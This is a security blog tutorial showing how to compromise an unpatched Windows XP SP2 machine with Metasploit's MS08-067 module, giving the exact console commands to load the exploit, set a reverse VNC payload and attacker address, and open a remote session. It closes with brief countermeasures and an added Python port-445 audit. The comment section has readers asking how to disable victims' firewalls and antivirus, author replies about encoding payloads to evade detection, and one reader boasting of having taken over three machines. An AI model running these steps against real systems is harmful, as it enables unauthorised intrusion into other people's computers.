Attacking Windows XP SP2 With Metasploit

In the previous post related to Metasploit, "How To Use A Keylogger Inside Metasploit Using Meterpreter?", I explained an easy-to-use keylogger inside Meterpreter for capturing the victim's keystrokes. However, after writing that article I received some comments which disappointed me a lot: readers were asking questions like "What is Metasploit?" and "What is Meterpreter?", so I decided not to jump into advanced topics before covering the basics.

In this article I will show you how to use the ms08_067_netapi exploit against an unpatched Windows XP machine to gain access to it. The full name of the exploit is "Microsoft Server Service Relative Path Stack Corruption"; this module is capable of bypassing NX on various operating systems and service packs. Before we jump into the actual exploitation process, I would suggest taking some time to look at the exploit code here.

Requirements

1. Backtrack 5
2. Windows XP SP2 operating system

We will perform this attack on an unpatched Windows XP operating system. I strongly recommend that you try it in a safe environment; utilizing these methods in a public environment is definitely a crime.

Windows XP SP2 Setup

Before we attack the Windows XP OS, we want to make sure that it is vulnerable and that it has port 445 open.

Attacking A Windows XP Host With Metasploit

So here is how we will hack into the Windows XP machine using the Metasploit Framework. If you are unfamiliar with Metasploit basics, consider reading our post Metasploit Framework Explained For Beginners.

Step 1 - First of all, turn on your Backtrack 5 virtual machine.

Step 2 - Next, in your console type "msfconsole". This will load the Metasploit Framework.

Step 3 - Next, type the command "show exploits". This will list all the exploits currently in Metasploit.

Step 4 - Next, issue the "search netapi" command in the console. This command will search for all exploit modules matching the pattern "netapi".

Step 5 - Next, type "use windows/smb/ms08_067_netapi" in the console.

Step 6 - Now that the exploit has been selected, you need to set RHOST; RHOST refers to the IP address of the victim. You can get the Windows host's IP by issuing the "ipconfig" command in its command prompt.

Step 7 - Once the exploit is set up, it's time to set up a payload. In this case we will use the windows/vncinject/reverse_tcp payload; select it by issuing "set payload windows/vncinject/reverse_tcp" in the console. Next, set the proper LHOST by issuing the command "set LHOST <IP address>".

Step 8 - Next, issue the command "show options" to check that everything is set up correctly.

Step 9 - Once you are done with the assessment, just type "exploit" in the console. If you followed the steps correctly you will have a VNC session opened on the victim's computer.

If you have any questions, Feel free to ask.

Countermeasures

1. Make sure your firewall is turned on.
2. Make sure you have installed the latest updates.
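The setup section above says the target must have port 445 open, and the first countermeasure is to keep the firewall on. As an added example that is not part of the original post, here is a small Python audit a defender can run against hosts on a network they administer, to confirm that TCP/445 is actually blocked where the firewall is supposed to be on. The inventory below is a constructed sample (documentation addresses), not real hosts.

```python
"""Audit whether hosts on your own network expose TCP/445 (the port MS08-067 needs).

Added example, not code from the original post. Replace SAMPLE_INVENTORY
with hosts you own or are authorised to check.
"""
import socket
from concurrent.futures import ThreadPoolExecutor

# Constructed sample inventory: host -> expected state of TCP/445 from this vantage point.
# "closed" means the Windows Firewall should be blocking SMB from the network;
# "open" means the host legitimately serves SMB (e.g. a file server).
SAMPLE_INVENTORY = {
    "192.0.2.10": "closed",   # lab XP SP2 box, firewall supposed to be on
    "192.0.2.11": "open",     # file server that is expected to offer SMB
}


def port_reachable(host, port=445, timeout=2.0):
    """Return True if a TCP connection to host:port completes, i.e. the port is exposed."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, or timed out (socket.timeout is an OSError)
        return False


def audit(inventory, port=445, timeout=2.0):
    """Return a list of (host, expected, actual) for hosts whose real state differs.

    An entry ("192.0.2.10", "closed", "open") means the firewall is NOT doing its job.
    """
    def check(item):
        host, expected = item
        actual = "open" if port_reachable(host, port, timeout) else "closed"
        return host, expected, actual

    with ThreadPoolExecutor(max_workers=16) as pool:
        results = list(pool.map(check, inventory.items()))
    return [r for r in results if r[1] != r[2]]


if __name__ == "__main__":
    findings = audit(SAMPLE_INVENTORY)
    if not findings:
        print("All hosts match their expected TCP/445 state.")
    for host, expected, actual in findings:
        print(f"{host}: expected {expected}, found {actual}")
```

A host reported as "expected closed, found open" is exactly the condition the walkthrough above relies on, so it needs the firewall enabled and the missing updates installed.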


1. Is there any way to exploit the Win XP with Metasploit without disabling the antivirus, firewall and automatic updates........

2. @Nadren
    Getting around antivirus is not a hard task, even if the firewall is already installed. However, if the system is updated it would certainly be patched against this vulnerability. The other option is to try client-side exploits; this is where your social engineering skills come into play.

3. Do we have to disable the antivirus and firewall on the victim's PC before the attack..?

4. I already disabled the anti-virus and firewall, but Metasploit shows "Exploit Completed but No Session was Created".
    Why does it happen??????????????????????

5. @Hamza
    Antivirus detection can be bypassed by using encoders to encode your payload, but the firewall needs to be turned off in order for this exploit to work.

    @Naren Yadav

Kindly send me a screenshot of the error and I will tell you where you have gone wrong.

6. Hello Sir, how can we turn off the firewall and antivirus on the victim PC? Are you joking? Will I first tell my victim "turn off your firewall and antivirus"? lol. Don't joke, Baloch brother, tell me the method for turning off the firewall: how will we turn off the victim's firewall or antivirus with Metasploit??

7. @Anonymous
    First of all, I really can't understand what you are trying to say. The firewall isn't the issue; the issue is antivirus, as when the payload is injected the antivirus will recognize it as a backdoor. Professional penetration testers use their own custom payloads.

8. Nice tut, dude..... 3 SP2s have been owned after this...
    Dude, can you tell us how to hack a remote desktop connection without brute forcing? Waiting for your reply... and post.

9. It doesn't work!
    [-] Exploit exception: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)

10. Hello, it's a nice article, but when I try to exploit it gives me an error like "the following option failed to validate : RHOST" exploit completed but no session was created. Can you help me with what happened & how to solve it...

11. Hey, how to bypass the firewall?

12. Hey, how to bypass the firewall?

13. You know this procedure doesn't work with WIN7... I mean no session is created....... Now tell me what I have to do with a WIN7 system????

  14. set SMBDomain mydomainname.tld

  15. set SMBDomain mydomainname.tld

  16. [-] Exploit exception: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)

  17. Exploit exception: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)

18. Disabling antivirus and firewall before executing Metasploit, is this called a HACK? HAHA :D, this is not a hack. A hack is when, using an attacker system, the attacker tries to disable the AV / firewall on the victim's system from the attacker's machine.

19. Turning off the firewall is not compulsory; however, antivirus must be turned off because the default Metasploit payloads get detected easily. So you would need to create your own custom undetectable payloads in order to bypass it.

20. How to disable the victim's antivirus?

21. No matter what I do, even when I follow the exact steps, it shows the host when I scan but will not exploit it. It just keeps saying "attempting to trigger the vulnerability"??? Even when I try Metasploit and payloads it all loads but nothing ever happens on the victim machine, which is a Windows XP Service Pack 2 with no virus protection and the firewall completely turned off?? I have no clue what the problem may be or if I'm doing something wrong on the host machine. Please help??

22. Exploit exception: the option refused by RHOST.

    Exploit finished, no session.

    This is the message I got at the end..

    How to fix it?

23. What's going on after step 4? + How to get the victim's IP address...
    Ab.Rafay, please try to explain more in your future articles, or write 2 articles, 1 for noobs and the other for professionals..

24. Hahahah, before attacking the victim PC disable the firewall and antivirus.



© 2016 All Rights Reserved by RHA Info Sec.